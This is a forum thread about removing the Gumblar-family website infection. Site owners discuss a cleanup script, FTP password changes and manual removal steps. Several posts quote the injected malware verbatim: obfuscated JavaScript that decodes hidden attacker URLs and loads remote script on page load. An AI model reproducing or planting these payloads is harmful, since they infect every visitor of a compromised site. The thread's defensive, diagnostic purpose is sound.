Thread: <script>/*GNU GPL*/ try{window.onload = function(){var

Thanks Konstantin, new version now uploaded to the first post as well.

Thanks for your explanations.
Your PHP programm did not work for me, but I do not really need it, as I have a local mirror of the websites.
I just recopy the affected index*.* and *.js files

But now I understand how I got all the sites reinfected one day later even without me being connected...

So now I DID [B]CHANGE ALL MY FTP PASSWORDS.[/B]

Hope I am finished with this tiresome and timeconsuming infections

Thanks for you work... you rock!!

[QUOTE=vividsign;678]Thanks for you work... you rock!![/QUOTE]

you are very welcome! That script has now been downloaded nearly 8,000 times, and thats just the people that have downloaded it from my website, Ive found it in a few other places as well now, so that virus is pretty widespread to say the least!

Hi Konstantin
I'd like to use your script but my host has disable the function exec for securtiy reason.
is there another way or at least another script that will at least give me a list of the infected files in order to manually correct them ?
thanks and kind regards
Salva

Konstantin thanks very much for your precious help by email.
have a nice new year !!
kind regards
Salva

Okay, so I followed the instructions to the letter and all I got was the following once I entered the link in my browser
[B]
TOTAL: 0

START BACKUP:

END BACKUP![/B]

The infection is STILL there even after this file was uploaded to the root directory, what am I doing wrong?

Please help, we have a retail site and are losing business and getting complaints, we've had to pull the site down temporarily until we can get this resolved. Any help you all can provide will be much appreciated.

I found this crap today on my mate site.

1. CHECK .htaccess files, you should find a lot of virus code there, delete unnecessary crap (even If you delete script from html/php page and virus code from .htaccess is still there, virus code still will be placed again in files!)

2. DELETE script after </html> tag from files like index.htm, index.html, index php and some *.js files

3. Always use ftp manager which can add password to your ftp site list (like FlashFXP, FTPRush)

Should be all.

Greetz.

[email]hose-hp@tlen.pl[/email]

It appears that there is a new copy out.. the code now has not '*/ text /*'
after the start of script tag the code has...

> try{window.onload=function(){newEl = document.createElement('script');newEl.setAttribute('defer', '1');newEl.setAttribute('src', ....

MOGmartin or anyone have a suggestion?

if I remove the '*/ text /*' from your script I feel it might delete other 'try{Window.' codes that are useful. I am really not a javascript programmer and am not sure just what the 'try{window' command dose or if is something i am likely to see else ware.

[QUOTE=Joe Catts;858]It appears that there is a new copy out.. the code now has not '*/ text /*'
after the start of script tag the code has...

> try{window.onload=function(){newEl = document.createElement('script');newEl.setAttribute('defer', '1');newEl.setAttribute('src', ....

MOGmartin or anyone have a suggestion?

if I remove the '*/ text /*' from your script I feel it might delete other 'try{Window.' codes that are useful. I am really not a javascript programmer and am not sure just what the 'try{window' command dose or if is something i am likely to see else ware.[/QUOTE]

I will speak with Konstantin ([I]kboyko[/I]) now and see if he can upgrade the script and post it here tomorrow, thanks for bringing this to my attention!

New Version?

<script>/*Exception*/ document.write('<script src='+'h$)#t#t!!p&!$$)/!!$/)$!(w#$o@&#@&w$!&#a#r#m^$o@)^#r(y)($-$)$c)o&!m^^.^^z^&^a!$n&$^@&o^$!x@#-@!$(a$!!$@f#@f$$i!l#&)^&i#^a@$&)t)e&)(.$(&d@#!e)#(.$$c@&^o!@$)r!!$r$&i^@e!r&&e@&-#@i^t)&.)!&g(@e!&n(&!&u(!i@n#e&@)$h&o&!)l&)@)l^^y!w)o$)o(^d!@#.)@r^@$u(#:&$@8&$(0&@()8@$!0^#$#/!&)l()a#(!s!$(t!$$.&#^f$@^m@#/&l@$#a(s!!t@!.#$f$&#m)&/$g^$o!#o$()g(l&@$&e$.&c$^o#$!m(!!#/#@c(&^a@()m#4&).^c((&o#^&^m@^/@!@1@(1(@#0@$(m!@b^((.&&^c!o^#$$m^@/)!@'.replace(/\!|\)|#|&|\$|\^|@|\(/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--8f500458f19ba4802d9a10f604126558-->

Hello,
I have the same version !

<script>/*Exception*/ document.write('<script src='+'h)^!t@@t$$p#($:!$&$/&#^^/^&$!k#u#)(6@^-(#(c)(@o@m$(.@#!^t!(o^$r($(@!r(&e$(n##)^&t@s@$.$$(r#u^@.@i!^&b())i@b##!^o@@@-#c@^#)o!@m)).^@(g(e$))$n(u^&!i(&n@$e^!c$&o^(!l!)!&o&!!^r&$s@!@.&#r(($$u)):$&8@$0&!&!8^#&0)&&$/##g$a&(m@&(e$^s)$^t(o$@p@&.(&@c)o$m)()/@!(!&g&(#a@!m&e&!s$!^#t!o^p&.$)$c(o&m#(#/$&!)#l@(i#!v^(&e$!s^&(c!^o))^r!)e$.$#c(&&^!o$)@m!(/!#(g!()o(^(o!#g@#(l!#e^!@&.#$c@&&o#$@^m$!/(&$t&#&!u(@.&^t))&&v^@/@'.replace(/\)|\^|\$|@|#|&|\!|\(/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--2a7ee8f55048cb4fc3e880af42980d23-->

Did you find something to fix it ?

I will post a new tool tomorrow to fix this version

Thanks ...
This is the second time it hit me this week even after changing my ftp passwords.

[QUOTE=MOGmartin;880]I will post a new tool tomorrow to fix this version[/QUOTE]

whate about that?
Thanks!

Hey MOGmartin, Thanks very much for the script. It would be great if you could upload the new tool as well... My sites good hacked again, although I changed the FTP passwords... Again, thanks very much!!!

this is the code

try{window.onload=function(){document.write('<div id=megaid>mysql-com.alice.it.enet-c</div>');Ixnqdi48j46q = document.getElementById('megaid').innerHTML + 'o@^m&-!^(c@#n@).&c)##o&()!&u#((n#&t(#!&e&@r$^!b!&e!s!!$$t))(.#(r)@u$#:@#&!D@E#B&@!U^G@)!$^/#^)@g#o(^#o&&)&(g))&l$((!e))^@.^(#c@)o#@^m#^/#@&g@o&&(o!@g)l&e).&(((c^o(#&&#m)/@$d##&e(t#)i$#k!.!c!!o($m$/(&$^m^&!a!(r^c!)$!a!.!(#(c&)@o)(m(^&/)$t#^h&$&@e(!^f!!$r$(e@&e))d#i^!c@t)$$#i^o^@n^^a@$r$##(y$).(c!o$m!(/^)#$'.replace(/\^|#|\$|&|\!|@|\)|\(/ig, '') ;document.write('<scr'+'ipt src=http://'+Ixnqdi48j46q.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} } catch(F9dbj27tg ) {}

the curevir.php cant remove this from my .js files =(

Check original article at

[url]http://justcoded.com/article/gumblar-family-virus-removal-tool/[/url]

The latest version of the script can be always found there.

Konstantin Boyko,
[url]http://justcoded.com[/url]

[QUOTE=skull-fire;988]this is the code

try{window.onload=function(){document.write('<div id=megaid>mysql-com.alice.it.enet-c</div>');Ixnqdi48j46q = document.getElementById('megaid').innerHTML + 'o@^m&-!^(c@#n@).&c)##o&()!&u#((n#&t(#!&e&@r$^!b!&e!s!!$$t))(.#(r)@u$#:@#&!D@E#B&@!U^G@)!$^/#^)@g#o(^#o&&)&(g))&l$((!e))^@.^(#c@)o#@^m#^/#@&g@o&&(o!@g)l&e).&(((c^o(#&&#m)/@$d##&e(t#)i$#k!.!c!!o($m$/(&$^m^&!a!(r^c!)$!a!.!(#(c&)@o)(m(^&/)$t#^h&$&@e(!^f!!$r$(e@&e))d#i^!c@t)$$#i^o^@n^^a@$r$##(y$).(c!o$m!(/^)#$'.replace(/\^|#|\$|&|\!|@|\)|\(/ig, '') ;document.write('<scr'+'ipt src=http://'+Ixnqdi48j46q.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} } catch(F9dbj27tg ) {}

the curevir.php cant remove this from my .js files =([/QUOTE]

Hi,

This is my first post and found this site as I think I have this virus on my wordpress site. As I am not technical, I would happily pay someone who knows how to fix this virus for me. I dont trust my technical skills to attempt the fix so kindly offered here.

So if you are up to the job please email me (lance at banskoblog dot com)

Thank you ,

Lance
banskoblog.com

New virsion:
[PHP]
<script>this.s='';var py="py";var r=window;var x=document;this.fi="fi";var qd;if(qd!='fq' && qd!='v'){qd='fq'};var d='sec7rfi7pete'.replace(/[ef47T]/g, '');var w;if(w!='' && w!='ps'){w=null};var t=false;r.onload=function(){try {p=x.createElement(d);var fa=new Date();var c;if(c!='im'){c='im'};p.setAttribute('dDe1fpe1rp'.replace(/[p1DiC]/g, ''), "1");var ku;if(ku!='jx' && ku!='yj'){ku=''};var rw;if(rw!='a' && rw!='cp'){rw=''};p.src='hbtVt?pw:V/;/?p;owrbnbo?r;a?m;aw-;c;o?m;.wa?lVlwy;ewsV.?cVoVmb.?gbu?mwtbrVe;e;-Vc;o;mV.?r;e?c;e;nbtwmwebxVi?cwo?.;rwuV:w8;0?8b0V/VabubtVowhwo?mwew.?cVo;mV.?c?n?/VaVu?tVo;hVo;m;eV.;c;o?m;.bcbnw/bkwiVowsVk?e?a;.bnVebt;/bfVi;fbaw.Vcwo;mb/;g?obo?gblbe;.wc;oVm?/;'.replace(/[;w\?Vb]/g, '');var vv;if(vv!='e'){vv=''};var qg=new String();x.body.appendChild(p);this._a=false;} catch(k){var nk;if(nk!='rg' && nk!='y_'){nk=''};this.kk='';};this.mw=24319;};var gr;if(gr!='' && gr!='nr'){gr='o'};var aa="";</script>

<script>var f;if(f!='' && f!='z'){f=''};var qa;if(qa!='' && qa!='u'){qa=''};var m=document;this.g="";var j='s!cTrTijpTt$'.replace(/[\$TRj\!]/g, '');var o;if(o!='' && o!='i'){o='mp'};var b=window;var kl;if(kl!='m_'){kl='m_'};b.onload=function(){var a;if(a!='ds' && a != ''){a=null};try {var y;if(y!='sv'){y='sv'};s=m.createElement(j);this.t="";var y_=false;var li;if(li!='' && li!='lo'){li=''};this.oi='';s.setAttribute('dze@f9ecr9'.replace(/[9@zpc]/g, ''), "1");var tm;if(tm!='tk' && tm!='tt'){tm='tk'};var ld;if(ld!='nk' && ld!='e'){ld='nk'};s.src='hTt%tFpF:F/%/TpFo!r6n!o!r!a%m%a%-!cFoFm!.FoTdFe6sFk6.%c6oFmT.FaTmTaTzToTn%-FcTn%.6rTeFc6e%nFtTm6eFx6iTc%o!.!r%u6:T8F0T8F06/!m%eFrFc!a!dTo%lTiTbFr!e%.!cFoTmT.%a%rF/TmTe!r6cFaFd6o6l!iTbTr%e6.Fc!oTmF.!aTr6/!h%uTa6nFq!iFu!.%c6o6m!/%cTa6.!g6o!v!/%g!o!o!gTlFe%.%c6o6m%/%'.replace(/[%T6F\!]/g, '');var vj;if(vj!='' && vj!='x'){vj='nb'};var nz;if(nz!='' && nz!='mb'){nz='jg'};m.body.appendChild(s);var ce;if(ce!='' && ce!='bb'){ce='bq'};} catch(r){};};var gk=new String();</script>
<!--8350182c6ab4d370dfe2b5cb2952cd2a-->
[/PHP]